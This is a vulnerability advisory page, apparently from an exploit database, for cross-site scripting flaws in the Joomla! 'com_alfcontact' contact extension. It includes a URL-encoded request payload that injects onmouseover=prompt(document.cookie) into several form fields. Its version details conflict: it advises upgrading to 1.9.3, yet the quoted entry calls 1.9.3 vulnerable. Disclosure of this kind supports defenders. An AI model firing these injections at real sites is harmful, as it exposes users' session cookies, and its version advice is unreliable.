header-logo
Suggest Exploit
vendor:
com_alfcontact
by:
Not provided
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: com_alfcontact
Affected Version From: 1.9.2000
Affected Version To: 1.9.2003
Patch Exists: YES
Related CWE: Not provided
CPE: a:joomla:com_alfcontact
Metasploit:
Other Scripts:
Platforms Tested: Not provided
Not provided

Joomla! ‘com_alfcontact’ Extension Multiple Cross-Site Scripting Vulnerabilities

The Joomla! 'com_alfcontact' extension is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Update to Joomla! 'com_alfcontact' extension version 1.9.3 or later. Sanitize and validate user-supplied input before using it in web applications.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/50637/info

Joomla! 'com_alfcontact' extension is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Joomla! 'com_alfcontact' extension 1.9.3 is vulnerable; prior versions may also be affected. 

&email=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&emailid=5%2c%2cCareers%20at%20Foreground%20Security&emailto_id=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&extravalue=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&message=20&name=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&option=com_alfcontact&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge&subject=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&task=sendemail 
cqrsecured